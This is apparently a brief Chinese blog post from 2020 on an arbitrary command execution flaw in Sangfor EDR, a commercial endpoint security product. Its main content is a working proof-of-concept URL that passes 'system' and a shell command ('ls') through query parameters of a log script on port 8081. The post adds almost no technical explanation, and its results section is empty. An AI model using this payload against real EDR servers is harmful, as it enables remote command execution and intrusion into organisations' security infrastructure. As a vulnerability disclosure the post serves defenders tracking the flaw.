sangforEDR 任意命令执行

EDR

使用范围

由于只有POC 没有详细细节。暂时不知道具体细节。
部分EDR 已经完成升级,不存在该漏洞。

POC

https://XXX:8081/tool/log/c.php?strip_slashes=system&host=ls 命令执行点为 ls

结果如下:

posted @ 2020-08-17 21:04  李慢慢233  阅读(1218)  评论(2编辑  收藏  举报